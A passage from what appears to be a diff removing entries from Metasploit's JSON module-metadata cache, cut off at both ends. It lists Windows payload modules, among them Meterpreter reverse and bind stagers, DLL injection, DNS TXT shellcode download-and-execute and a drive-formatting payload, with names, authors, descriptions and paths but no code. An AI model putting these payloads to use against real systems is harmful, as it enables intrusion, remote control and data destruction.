false, - "payload_type": 2, - "staged": true, - "stage_refname": "windows/dllinject", - "stager_refname": "windows/reverse_tcp_uuid" - }, - "payload_windows/dllinject/reverse_winhttp": { - "name": "Reflective DLL Injection, Windows Reverse HTTP Stager (winhttp)", - "fullname": "payload/windows/dllinject/reverse_winhttp", - "aliases": [], - "rank": 300, - "disclosure_date": null, - "type": "payload", - "author": [ - "sf ", - "hdm ", - "Borja Merino " - ], - "description": "Inject a DLL via a reflective loader.\n\nTunnel communication over HTTP (Windows winhttp)", - "references": [ - "URL-https://github.com/stephenfewer/ReflectiveDLLInjection", - "URL-https://github.com/rapid7/ReflectiveDLLInjection" - ], - "platform": "Windows", - "arch": "x86", - "rport": null, - "autofilter_ports": null, - "autofilter_services": null, - "targets": null, - "mod_time": "2025-04-19 11:11:01 +0000", - "path": "/modules/payloads/stagers/windows/reverse_winhttp.rb", - "is_install_path": true, - "ref_name": "windows/dllinject/reverse_winhttp", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": false, - "payload_type": 2, - "staged": true, - "stage_refname": "windows/dllinject", - "stager_refname": "windows/reverse_winhttp" - }, - "payload_windows/dns_txt_query_exec": { - "name": "DNS TXT Record Payload Download and Execution", - "fullname": "payload/windows/dns_txt_query_exec", - "aliases": [], - "rank": 300, - "disclosure_date": null, - "type": "payload", - "author": [ - "corelanc0d3r " - ], - "description": "Performs a TXT query against a series of DNS record(s) and executes the returned x86 shellcode. The DNSZONE\n option is used as the base name to iterate over. The payload will first request the TXT contents of the a\n hostname, followed by b, then c, etc. until there are no more records. For each record that is returned, exactly\n 255 bytes from it are copied into a buffer that is eventually executed. 
This buffer should be encoded using\n x86/alpha_mixed with the BufferRegister option set to EDI.", - "references": [], - "platform": "Windows", - "arch": "x86", - "rport": null, - "autofilter_ports": null, - "autofilter_services": null, - "targets": null, - "mod_time": "2025-04-20 02:57:34 +0000", - "path": "/modules/payloads/singles/windows/dns_txt_query_exec.rb", - "is_install_path": true, - "ref_name": "windows/dns_txt_query_exec", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": false, - "payload_type": 1, - "staged": false - }, - "payload_windows/download_exec": { - "name": "Windows Executable Download (http,https,ftp) and Execute", - "fullname": "payload/windows/download_exec", - "aliases": [], - "rank": 300, - "disclosure_date": null, - "type": "payload", - "author": [ - "corelanc0d3r " - ], - "description": "Download an EXE from an HTTP(S)/FTP URL and execute it", - "references": [], - "platform": "Windows", - "arch": "x86", - "rport": null, - "autofilter_ports": null, - "autofilter_services": null, - "targets": null, - "mod_time": "2025-04-20 02:57:34 +0000", - "path": "/modules/payloads/singles/windows/download_exec.rb", - "is_install_path": true, - "ref_name": "windows/download_exec", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": false, - "payload_type": 1, - "staged": false - }, - "payload_windows/exec": { - "name": "Windows Execute Command", - "fullname": "payload/windows/exec", - "aliases": [], - "rank": 300, - "disclosure_date": null, - "type": "payload", - "author": [ - "vlad902 ", - "sf " - ], - "description": "Execute an arbitrary command", - "references": [], - "platform": "Windows", - "arch": "x86", - "rport": null, - "autofilter_ports": null, - "autofilter_services": null, - "targets": null, - "mod_time": "2025-04-20 02:57:34 +0000", - "path": 
"/modules/payloads/singles/windows/exec.rb", - "is_install_path": true, - "ref_name": "windows/exec", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": false, - "payload_type": 1, - "staged": false - }, - "payload_windows/format_all_drives": { - "name": "Windows Drive Formatter", - "fullname": "payload/windows/format_all_drives", - "aliases": [], - "rank": 0, - "disclosure_date": null, - "type": "payload", - "author": [ - "Ashfaq Ansari ", - "Ruei-Min Jiang " - ], - "description": "This payload formats all mounted disks in Windows (aka ShellcodeOfDeath).\n\n After formatting, this payload sets the volume label to the string specified in\n the VOLUMELABEL option. If the code is unable to access a drive for any reason,\n it skips the drive and proceeds to the next volume.", - "references": [ - "URL-http://hacksys.vfreaks.com/research/shellcode-of-death.html", - "URL-https://github.com/hacksysteam/ShellcodeOfDeath" - ], - "platform": "Windows", - "arch": "x86", - "rport": null, - "autofilter_ports": null, - "autofilter_services": null, - "targets": null, - "mod_time": "2025-04-20 02:57:34 +0000", - "path": "/modules/payloads/singles/windows/format_all_drives.rb", - "is_install_path": true, - "ref_name": "windows/format_all_drives", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": { - "AKA": [ - "ShellcodeOfDeath" - ] - }, - "session_types": false, - "needs_cleanup": false, - "payload_type": 1, - "staged": false - }, - "payload_windows/loadlibrary": { - "name": "Windows LoadLibrary Path", - "fullname": "payload/windows/loadlibrary", - "aliases": [], - "rank": 300, - "disclosure_date": null, - "type": "payload", - "author": [ - "sf ", - "hdm " - ], - "description": "Load an arbitrary library path", - "references": [], - "platform": "Windows", - "arch": "x86", - "rport": null, - "autofilter_ports": null, - "autofilter_services": null, - "targets": null, - 
"mod_time": "2025-04-20 02:57:34 +0000", - "path": "/modules/payloads/singles/windows/loadlibrary.rb", - "is_install_path": true, - "ref_name": "windows/loadlibrary", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": false, - "payload_type": 1, - "staged": false - }, - "payload_windows/messagebox": { - "name": "Windows MessageBox", - "fullname": "payload/windows/messagebox", - "aliases": [], - "rank": 300, - "disclosure_date": null, - "type": "payload", - "author": [ - "corelanc0d3r ", - "jduck " - ], - "description": "Spawns a dialog via MessageBox using a customizable title, text & icon", - "references": [], - "platform": "Windows", - "arch": "x86", - "rport": null, - "autofilter_ports": null, - "autofilter_services": null, - "targets": null, - "mod_time": "2024-11-28 06:39:07 +0000", - "path": "/modules/payloads/singles/windows/messagebox.rb", - "is_install_path": true, - "ref_name": "windows/messagebox", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": false, - "payload_type": 1, - "staged": false - }, - "payload_windows/meterpreter/bind_hidden_ipknock_tcp": { - "name": "Windows Meterpreter (Reflective Injection), Hidden Bind Ipknock TCP Stager", - "fullname": "payload/windows/meterpreter/bind_hidden_ipknock_tcp", - "aliases": [], - "rank": 300, - "disclosure_date": null, - "type": "payload", - "author": [ - "skape ", - "sf ", - "OJ Reeves", - "hdm ", - "Borja Merino " - ], - "description": "Inject the Meterpreter server DLL via the Reflective Dll Injection payload (staged). Requires Windows XP SP2 or newer.\n\nListen for a connection. First, the port will need to be knocked from\nthe IP defined in KHOST. This IP will work as an authentication method\n(you can spoof it with tools like hping). After that you could get your\nshellcode from any IP. 
The socket will appear as \"closed,\" thus helping to\nhide the shellcode", - "references": [ - "URL-https://github.com/stephenfewer/ReflectiveDLLInjection", - "URL-https://github.com/rapid7/ReflectiveDLLInjection", - "URL-http://www.shelliscoming.com/2014/07/ip-knock-shellcode-spoofed-ip-as.html" - ], - "platform": "Windows", - "arch": "x86", - "rport": null, - "autofilter_ports": null, - "autofilter_services": null, - "targets": null, - "mod_time": "2025-04-19 11:11:01 +0000", - "path": "/modules/payloads/stagers/windows/bind_hidden_ipknock_tcp.rb", - "is_install_path": true, - "ref_name": "windows/meterpreter/bind_hidden_ipknock_tcp", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": false, - "payload_type": 2, - "staged": true, - "stage_refname": "windows/meterpreter", - "stager_refname": "windows/bind_hidden_ipknock_tcp" - }, - "payload_windows/meterpreter/bind_hidden_tcp": { - "name": "Windows Meterpreter (Reflective Injection), Hidden Bind TCP Stager", - "fullname": "payload/windows/meterpreter/bind_hidden_tcp", - "aliases": [], - "rank": 300, - "disclosure_date": null, - "type": "payload", - "author": [ - "skape ", - "sf ", - "OJ Reeves", - "hdm ", - "Borja Merino " - ], - "description": "Inject the Meterpreter server DLL via the Reflective Dll Injection payload (staged). 
Requires Windows XP SP2 or newer.\n\nListen for a connection from a hidden port and spawn a command shell to the allowed host.", - "references": [ - "URL-https://github.com/stephenfewer/ReflectiveDLLInjection", - "URL-https://github.com/rapid7/ReflectiveDLLInjection", - "URL-http://www.shelliscoming.com/2014/03/hidden-bind-shell-keep-your-shellcode.html" - ], - "platform": "Windows", - "arch": "x86", - "rport": null, - "autofilter_ports": null, - "autofilter_services": null, - "targets": null, - "mod_time": "2025-04-19 11:11:01 +0000", - "path": "/modules/payloads/stagers/windows/bind_hidden_tcp.rb", - "is_install_path": true, - "ref_name": "windows/meterpreter/bind_hidden_tcp", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": false, - "payload_type": 2, - "staged": true, - "stage_refname": "windows/meterpreter", - "stager_refname": "windows/bind_hidden_tcp" - }, - "payload_windows/meterpreter/bind_ipv6_tcp": { - "name": "Windows Meterpreter (Reflective Injection), Bind IPv6 TCP Stager (Windows x86)", - "fullname": "payload/windows/meterpreter/bind_ipv6_tcp", - "aliases": [], - "rank": 300, - "disclosure_date": null, - "type": "payload", - "author": [ - "skape ", - "sf ", - "OJ Reeves", - "hdm " - ], - "description": "Inject the Meterpreter server DLL via the Reflective Dll Injection payload (staged). 
Requires Windows XP SP2 or newer.\n\nListen for an IPv6 connection (Windows x86)", - "references": [ - "URL-https://github.com/stephenfewer/ReflectiveDLLInjection", - "URL-https://github.com/rapid7/ReflectiveDLLInjection" - ], - "platform": "Windows", - "arch": "x86", - "rport": null, - "autofilter_ports": null, - "autofilter_services": null, - "targets": null, - "mod_time": "2025-04-19 11:11:01 +0000", - "path": "/modules/payloads/stagers/windows/bind_ipv6_tcp.rb", - "is_install_path": true, - "ref_name": "windows/meterpreter/bind_ipv6_tcp", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": false, - "payload_type": 2, - "staged": true, - "stage_refname": "windows/meterpreter", - "stager_refname": "windows/bind_ipv6_tcp" - }, - "payload_windows/meterpreter/bind_ipv6_tcp_uuid": { - "name": "Windows Meterpreter (Reflective Injection), Bind IPv6 TCP Stager with UUID Support (Windows x86)", - "fullname": "payload/windows/meterpreter/bind_ipv6_tcp_uuid", - "aliases": [], - "rank": 300, - "disclosure_date": null, - "type": "payload", - "author": [ - "skape ", - "sf ", - "OJ Reeves", - "hdm " - ], - "description": "Inject the Meterpreter server DLL via the Reflective Dll Injection payload (staged). 
Requires Windows XP SP2 or newer.\n\nListen for an IPv6 connection with UUID Support (Windows x86)", - "references": [ - "URL-https://github.com/stephenfewer/ReflectiveDLLInjection", - "URL-https://github.com/rapid7/ReflectiveDLLInjection" - ], - "platform": "Windows", - "arch": "x86", - "rport": null, - "autofilter_ports": null, - "autofilter_services": null, - "targets": null, - "mod_time": "2025-04-19 11:11:01 +0000", - "path": "/modules/payloads/stagers/windows/bind_ipv6_tcp_uuid.rb", - "is_install_path": true, - "ref_name": "windows/meterpreter/bind_ipv6_tcp_uuid", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": false, - "payload_type": 2, - "staged": true, - "stage_refname": "windows/meterpreter", - "stager_refname": "windows/bind_ipv6_tcp_uuid" - }, - "payload_windows/meterpreter/bind_named_pipe": { - "name": "Windows Meterpreter (Reflective Injection), Windows x86 Bind Named Pipe Stager", - "fullname": "payload/windows/meterpreter/bind_named_pipe", - "aliases": [], - "rank": 300, - "disclosure_date": null, - "type": "payload", - "author": [ - "skape ", - "sf ", - "OJ Reeves", - "UserExistsError" - ], - "description": "Inject the Meterpreter server DLL via the Reflective Dll Injection payload (staged). 
Requires Windows XP SP2 or newer.\n\nListen for a pipe connection (Windows x86)", - "references": [ - "URL-https://github.com/stephenfewer/ReflectiveDLLInjection", - "URL-https://github.com/rapid7/ReflectiveDLLInjection" - ], - "platform": "Windows", - "arch": "x86", - "rport": null, - "autofilter_ports": null, - "autofilter_services": null, - "targets": null, - "mod_time": "2025-04-19 11:11:01 +0000", - "path": "/modules/payloads/stagers/windows/bind_named_pipe.rb", - "is_install_path": true, - "ref_name": "windows/meterpreter/bind_named_pipe", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": false, - "payload_type": 2, - "staged": true, - "stage_refname": "windows/meterpreter", - "stager_refname": "windows/bind_named_pipe" - }, - "payload_windows/meterpreter/bind_nonx_tcp": { - "name": "Windows Meterpreter (Reflective Injection), Bind TCP Stager (No NX or Win7)", - "fullname": "payload/windows/meterpreter/bind_nonx_tcp", - "aliases": [], - "rank": 300, - "disclosure_date": null, - "type": "payload", - "author": [ - "skape ", - "sf ", - "OJ Reeves", - "vlad902 " - ], - "description": "Inject the Meterpreter server DLL via the Reflective Dll Injection payload (staged). 
Requires Windows XP SP2 or newer.\n\nListen for a connection (No NX)", - "references": [ - "URL-https://github.com/stephenfewer/ReflectiveDLLInjection", - "URL-https://github.com/rapid7/ReflectiveDLLInjection" - ], - "platform": "Windows", - "arch": "x86", - "rport": null, - "autofilter_ports": null, - "autofilter_services": null, - "targets": null, - "mod_time": "2025-04-19 11:11:01 +0000", - "path": "/modules/payloads/stagers/windows/bind_nonx_tcp.rb", - "is_install_path": true, - "ref_name": "windows/meterpreter/bind_nonx_tcp", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": false, - "payload_type": 2, - "staged": true, - "stage_refname": "windows/meterpreter", - "stager_refname": "windows/bind_nonx_tcp" - }, - "payload_windows/meterpreter/bind_tcp": { - "name": "Windows Meterpreter (Reflective Injection), Bind TCP Stager (Windows x86)", - "fullname": "payload/windows/meterpreter/bind_tcp", - "aliases": [], - "rank": 300, - "disclosure_date": null, - "type": "payload", - "author": [ - "skape ", - "sf ", - "OJ Reeves", - "hdm " - ], - "description": "Inject the Meterpreter server DLL via the Reflective Dll Injection payload (staged). 
Requires Windows XP SP2 or newer.\n\nListen for a connection (Windows x86)", - "references": [ - "URL-https://github.com/stephenfewer/ReflectiveDLLInjection", - "URL-https://github.com/rapid7/ReflectiveDLLInjection" - ], - "platform": "Windows", - "arch": "x86", - "rport": null, - "autofilter_ports": null, - "autofilter_services": null, - "targets": null, - "mod_time": "2025-04-19 11:11:01 +0000", - "path": "/modules/payloads/stagers/windows/bind_tcp.rb", - "is_install_path": true, - "ref_name": "windows/meterpreter/bind_tcp", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": false, - "payload_type": 2, - "staged": true, - "stage_refname": "windows/meterpreter", - "stager_refname": "windows/bind_tcp" - }, - "payload_windows/meterpreter/bind_tcp_rc4": { - "name": "Windows Meterpreter (Reflective Injection), Bind TCP Stager (RC4 Stage Encryption, Metasm)", - "fullname": "payload/windows/meterpreter/bind_tcp_rc4", - "aliases": [], - "rank": 300, - "disclosure_date": null, - "type": "payload", - "author": [ - "skape ", - "sf ", - "OJ Reeves", - "hdm ", - "mihi", - "RageLtMan" - ], - "description": "Inject the Meterpreter server DLL via the Reflective Dll Injection payload (staged). 
Requires Windows XP SP2 or newer.\n\nListen for a connection", - "references": [ - "URL-https://github.com/stephenfewer/ReflectiveDLLInjection", - "URL-https://github.com/rapid7/ReflectiveDLLInjection" - ], - "platform": "Windows", - "arch": "x86", - "rport": null, - "autofilter_ports": null, - "autofilter_services": null, - "targets": null, - "mod_time": "2025-04-19 11:11:01 +0000", - "path": "/modules/payloads/stagers/windows/bind_tcp_rc4.rb", - "is_install_path": true, - "ref_name": "windows/meterpreter/bind_tcp_rc4", - "check": false, - "post_auth": true, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": false, - "payload_type": 2, - "staged": true, - "stage_refname": "windows/meterpreter", - "stager_refname": "windows/bind_tcp_rc4" - }, - "payload_windows/meterpreter/bind_tcp_uuid": { - "name": "Windows Meterpreter (Reflective Injection), Bind TCP Stager with UUID Support (Windows x86)", - "fullname": "payload/windows/meterpreter/bind_tcp_uuid", - "aliases": [], - "rank": 300, - "disclosure_date": null, - "type": "payload", - "author": [ - "skape ", - "sf ", - "OJ Reeves", - "hdm " - ], - "description": "Inject the Meterpreter server DLL via the Reflective Dll Injection payload (staged). 
Requires Windows XP SP2 or newer.\n\nListen for a connection with UUID Support (Windows x86)", - "references": [ - "URL-https://github.com/stephenfewer/ReflectiveDLLInjection", - "URL-https://github.com/rapid7/ReflectiveDLLInjection" - ], - "platform": "Windows", - "arch": "x86", - "rport": null, - "autofilter_ports": null, - "autofilter_services": null, - "targets": null, - "mod_time": "2025-04-19 11:11:01 +0000", - "path": "/modules/payloads/stagers/windows/bind_tcp_uuid.rb", - "is_install_path": true, - "ref_name": "windows/meterpreter/bind_tcp_uuid", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": false, - "payload_type": 2, - "staged": true, - "stage_refname": "windows/meterpreter", - "stager_refname": "windows/bind_tcp_uuid" - }, - "payload_windows/meterpreter/find_tag": { - "name": "Windows Meterpreter (Reflective Injection), Find Tag Ordinal Stager", - "fullname": "payload/windows/meterpreter/find_tag", - "aliases": [], - "rank": 300, - "disclosure_date": null, - "type": "payload", - "author": [ - "skape ", - "sf ", - "OJ Reeves" - ], - "description": "Inject the Meterpreter server DLL via the Reflective Dll Injection payload (staged). 
Requires Windows XP SP2 or newer.\n\nUse an established connection", - "references": [ - "URL-https://github.com/stephenfewer/ReflectiveDLLInjection", - "URL-https://github.com/rapid7/ReflectiveDLLInjection" - ], - "platform": "Windows", - "arch": "x86", - "rport": null, - "autofilter_ports": null, - "autofilter_services": null, - "targets": null, - "mod_time": "2025-04-19 11:11:01 +0000", - "path": "/modules/payloads/stagers/windows/findtag_ord.rb", - "is_install_path": true, - "ref_name": "windows/meterpreter/find_tag", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": false, - "payload_type": 2, - "staged": true, - "stage_refname": "windows/meterpreter", - "stager_refname": "windows/findtag_ord" - }, - "payload_windows/meterpreter/reverse_http": { - "name": "Windows Meterpreter (Reflective Injection), Windows Reverse HTTP Stager (wininet)", - "fullname": "payload/windows/meterpreter/reverse_http", - "aliases": [], - "rank": 300, - "disclosure_date": null, - "type": "payload", - "author": [ - "skape ", - "sf ", - "OJ Reeves", - "hdm " - ], - "description": "Inject the Meterpreter server DLL via the Reflective Dll Injection payload (staged). 
Requires Windows XP SP2 or newer.\n\nTunnel communication over HTTP (Windows wininet)", - "references": [ - "URL-https://github.com/stephenfewer/ReflectiveDLLInjection", - "URL-https://github.com/rapid7/ReflectiveDLLInjection" - ], - "platform": "Windows", - "arch": "x86", - "rport": null, - "autofilter_ports": null, - "autofilter_services": null, - "targets": null, - "mod_time": "2025-04-19 11:11:01 +0000", - "path": "/modules/payloads/stagers/windows/reverse_http.rb", - "is_install_path": true, - "ref_name": "windows/meterpreter/reverse_http", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": false, - "payload_type": 2, - "staged": true, - "stage_refname": "windows/meterpreter", - "stager_refname": "windows/reverse_http" - }, - "payload_windows/meterpreter/reverse_http_proxy_pstore": { - "name": "Windows Meterpreter (Reflective Injection), Reverse HTTP Stager Proxy", - "fullname": "payload/windows/meterpreter/reverse_http_proxy_pstore", - "aliases": [], - "rank": 300, - "disclosure_date": null, - "type": "payload", - "author": [ - "skape ", - "sf ", - "OJ Reeves", - "hdm " - ], - "description": "Inject the Meterpreter server DLL via the Reflective Dll Injection payload (staged). 
Requires Windows XP SP2 or newer.\n\nTunnel communication over HTTP", - "references": [ - "URL-https://github.com/stephenfewer/ReflectiveDLLInjection", - "URL-https://github.com/rapid7/ReflectiveDLLInjection" - ], - "platform": "Windows", - "arch": "x86", - "rport": null, - "autofilter_ports": null, - "autofilter_services": null, - "targets": null, - "mod_time": "2025-04-19 11:11:01 +0000", - "path": "/modules/payloads/stagers/windows/reverse_http_proxy_pstore.rb", - "is_install_path": true, - "ref_name": "windows/meterpreter/reverse_http_proxy_pstore", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": false, - "payload_type": 2, - "staged": true, - "stage_refname": "windows/meterpreter", - "stager_refname": "windows/reverse_http_proxy_pstore" - }, - "payload_windows/meterpreter/reverse_https": { - "name": "Windows Meterpreter (Reflective Injection), Windows Reverse HTTPS Stager (wininet)", - "fullname": "payload/windows/meterpreter/reverse_https", - "aliases": [], - "rank": 300, - "disclosure_date": null, - "type": "payload", - "author": [ - "skape ", - "sf ", - "OJ Reeves", - "hdm " - ], - "description": "Inject the Meterpreter server DLL via the Reflective Dll Injection payload (staged). 
Requires Windows XP SP2 or newer.\n\nTunnel communication over HTTPS (Windows wininet)", - "references": [ - "URL-https://github.com/stephenfewer/ReflectiveDLLInjection", - "URL-https://github.com/rapid7/ReflectiveDLLInjection" - ], - "platform": "Windows", - "arch": "x86", - "rport": null, - "autofilter_ports": null, - "autofilter_services": null, - "targets": null, - "mod_time": "2025-04-19 11:11:01 +0000", - "path": "/modules/payloads/stagers/windows/reverse_https.rb", - "is_install_path": true, - "ref_name": "windows/meterpreter/reverse_https", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": false, - "payload_type": 2, - "staged": true, - "stage_refname": "windows/meterpreter", - "stager_refname": "windows/reverse_https" - }, - "payload_windows/meterpreter/reverse_ipv6_tcp": { - "name": "Windows Meterpreter (Reflective Injection), Reverse TCP Stager (IPv6)", - "fullname": "payload/windows/meterpreter/reverse_ipv6_tcp", - "aliases": [], - "rank": 300, - "disclosure_date": null, - "type": "payload", - "author": [ - "skape ", - "sf ", - "OJ Reeves", - "hdm " - ], - "description": "Inject the Meterpreter server DLL via the Reflective Dll Injection payload (staged). 
Requires Windows XP SP2 or newer.\n\nConnect back to the attacker over IPv6", - "references": [ - "URL-https://github.com/stephenfewer/ReflectiveDLLInjection", - "URL-https://github.com/rapid7/ReflectiveDLLInjection" - ], - "platform": "Windows", - "arch": "x86", - "rport": null, - "autofilter_ports": null, - "autofilter_services": null, - "targets": null, - "mod_time": "2025-04-19 11:11:01 +0000", - "path": "/modules/payloads/stagers/windows/reverse_ipv6_tcp.rb", - "is_install_path": true, - "ref_name": "windows/meterpreter/reverse_ipv6_tcp", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": false, - "payload_type": 2, - "staged": true, - "stage_refname": "windows/meterpreter", - "stager_refname": "windows/reverse_ipv6_tcp" - }, - "payload_windows/meterpreter/reverse_named_pipe": { - "name": "Windows Meterpreter (Reflective Injection), Windows x86 Reverse Named Pipe (SMB) Stager", - "fullname": "payload/windows/meterpreter/reverse_named_pipe", - "aliases": [], - "rank": 300, - "disclosure_date": null, - "type": "payload", - "author": [ - "skape ", - "sf ", - "OJ Reeves" - ], - "description": "Inject the Meterpreter server DLL via the Reflective Dll Injection payload (staged). 
Requires Windows XP SP2 or newer.\n\nConnect back to the attacker via a named pipe pivot", - "references": [ - "URL-https://github.com/stephenfewer/ReflectiveDLLInjection", - "URL-https://github.com/rapid7/ReflectiveDLLInjection" - ], - "platform": "Windows", - "arch": "x86", - "rport": null, - "autofilter_ports": null, - "autofilter_services": null, - "targets": null, - "mod_time": "2025-04-19 11:11:01 +0000", - "path": "/modules/payloads/stagers/windows/reverse_named_pipe.rb", - "is_install_path": true, - "ref_name": "windows/meterpreter/reverse_named_pipe", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": false, - "payload_type": 2, - "staged": true, - "stage_refname": "windows/meterpreter", - "stager_refname": "windows/reverse_named_pipe" - }, - "payload_windows/meterpreter/reverse_nonx_tcp": { - "name": "Windows Meterpreter (Reflective Injection), Reverse TCP Stager (No NX or Win7)", - "fullname": "payload/windows/meterpreter/reverse_nonx_tcp", - "aliases": [], - "rank": 300, - "disclosure_date": null, - "type": "payload", - "author": [ - "skape ", - "sf ", - "OJ Reeves", - "vlad902 " - ], - "description": "Inject the Meterpreter server DLL via the Reflective Dll Injection payload (staged). 
Requires Windows XP SP2 or newer.\n\nConnect back to the attacker (No NX)", - "references": [ - "URL-https://github.com/stephenfewer/ReflectiveDLLInjection", - "URL-https://github.com/rapid7/ReflectiveDLLInjection" - ], - "platform": "Windows", - "arch": "x86", - "rport": null, - "autofilter_ports": null, - "autofilter_services": null, - "targets": null, - "mod_time": "2025-04-19 11:11:01 +0000", - "path": "/modules/payloads/stagers/windows/reverse_nonx_tcp.rb", - "is_install_path": true, - "ref_name": "windows/meterpreter/reverse_nonx_tcp", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": false, - "payload_type": 2, - "staged": true, - "stage_refname": "windows/meterpreter", - "stager_refname": "windows/reverse_nonx_tcp" - }, - "payload_windows/meterpreter/reverse_ord_tcp": { - "name": "Windows Meterpreter (Reflective Injection), Reverse Ordinal TCP Stager (No NX or Win7)", - "fullname": "payload/windows/meterpreter/reverse_ord_tcp", - "aliases": [], - "rank": 300, - "disclosure_date": null, - "type": "payload", - "author": [ - "skape ", - "sf ", - "OJ Reeves", - "spoonm " - ], - "description": "Inject the Meterpreter server DLL via the Reflective Dll Injection payload (staged). 
Requires Windows XP SP2 or newer.\n\nConnect back to the attacker", - "references": [ - "URL-https://github.com/stephenfewer/ReflectiveDLLInjection", - "URL-https://github.com/rapid7/ReflectiveDLLInjection" - ], - "platform": "Windows", - "arch": "x86", - "rport": null, - "autofilter_ports": null, - "autofilter_services": null, - "targets": null, - "mod_time": "2025-04-19 11:11:01 +0000", - "path": "/modules/payloads/stagers/windows/reverse_ord_tcp.rb", - "is_install_path": true, - "ref_name": "windows/meterpreter/reverse_ord_tcp", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": false, - "payload_type": 2, - "staged": true, - "stage_refname": "windows/meterpreter", - "stager_refname": "windows/reverse_ord_tcp" - }, - "payload_windows/meterpreter/reverse_tcp": { - "name": "Windows Meterpreter (Reflective Injection), Reverse TCP Stager", - "fullname": "payload/windows/meterpreter/reverse_tcp", - "aliases": [], - "rank": 300, - "disclosure_date": null, - "type": "payload", - "author": [ - "skape ", - "sf ", - "OJ Reeves", - "hdm " - ], - "description": "Inject the Meterpreter server DLL via the Reflective Dll Injection payload (staged). 
Requires Windows XP SP2 or newer.\n\nConnect back to the attacker", - "references": [ - "URL-https://github.com/stephenfewer/ReflectiveDLLInjection", - "URL-https://github.com/rapid7/ReflectiveDLLInjection" - ], - "platform": "Windows", - "arch": "x86", - "rport": null, - "autofilter_ports": null, - "autofilter_services": null, - "targets": null, - "mod_time": "2025-04-19 11:11:01 +0000", - "path": "/modules/payloads/stagers/windows/reverse_tcp.rb", - "is_install_path": true, - "ref_name": "windows/meterpreter/reverse_tcp", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": false, - "payload_type": 2, - "staged": true, - "stage_refname": "windows/meterpreter", - "stager_refname": "windows/reverse_tcp" - }, - "payload_windows/meterpreter/reverse_tcp_allports": { - "name": "Windows Meterpreter (Reflective Injection), Reverse All-Port TCP Stager", - "fullname": "payload/windows/meterpreter/reverse_tcp_allports", - "aliases": [], - "rank": 300, - "disclosure_date": null, - "type": "payload", - "author": [ - "skape ", - "sf ", - "OJ Reeves", - "hdm " - ], - "description": "Inject the Meterpreter server DLL via the Reflective Dll Injection payload (staged). 
Requires Windows XP SP2 or newer.\n\nTry to connect back to the attacker, on all possible ports (1-65535, slowly)", - "references": [ - "URL-https://github.com/stephenfewer/ReflectiveDLLInjection", - "URL-https://github.com/rapid7/ReflectiveDLLInjection" - ], - "platform": "Windows", - "arch": "x86", - "rport": null, - "autofilter_ports": null, - "autofilter_services": null, - "targets": null, - "mod_time": "2025-04-19 11:11:01 +0000", - "path": "/modules/payloads/stagers/windows/reverse_tcp_allports.rb", - "is_install_path": true, - "ref_name": "windows/meterpreter/reverse_tcp_allports", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": false, - "payload_type": 2, - "staged": true, - "stage_refname": "windows/meterpreter", - "stager_refname": "windows/reverse_tcp_allports" - }, - "payload_windows/meterpreter/reverse_tcp_dns": { - "name": "Windows Meterpreter (Reflective Injection), Reverse TCP Stager (DNS)", - "fullname": "payload/windows/meterpreter/reverse_tcp_dns", - "aliases": [], - "rank": 300, - "disclosure_date": null, - "type": "payload", - "author": [ - "skape ", - "sf ", - "OJ Reeves", - "hdm ", - "RageLtMan" - ], - "description": "Inject the Meterpreter server DLL via the Reflective Dll Injection payload (staged). 
Requires Windows XP SP2 or newer.\n\nConnect back to the attacker", - "references": [ - "URL-https://github.com/stephenfewer/ReflectiveDLLInjection", - "URL-https://github.com/rapid7/ReflectiveDLLInjection" - ], - "platform": "Windows", - "arch": "x86", - "rport": null, - "autofilter_ports": null, - "autofilter_services": null, - "targets": null, - "mod_time": "2025-04-19 11:11:01 +0000", - "path": "/modules/payloads/stagers/windows/reverse_tcp_dns.rb", - "is_install_path": true, - "ref_name": "windows/meterpreter/reverse_tcp_dns", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": false, - "payload_type": 2, - "staged": true, - "stage_refname": "windows/meterpreter", - "stager_refname": "windows/reverse_tcp_dns" - }, - "payload_windows/meterpreter/reverse_tcp_rc4": { - "name": "Windows Meterpreter (Reflective Injection), Reverse TCP Stager (RC4 Stage Encryption, Metasm)", - "fullname": "payload/windows/meterpreter/reverse_tcp_rc4", - "aliases": [], - "rank": 300, - "disclosure_date": null, - "type": "payload", - "author": [ - "skape ", - "sf ", - "OJ Reeves", - "hdm 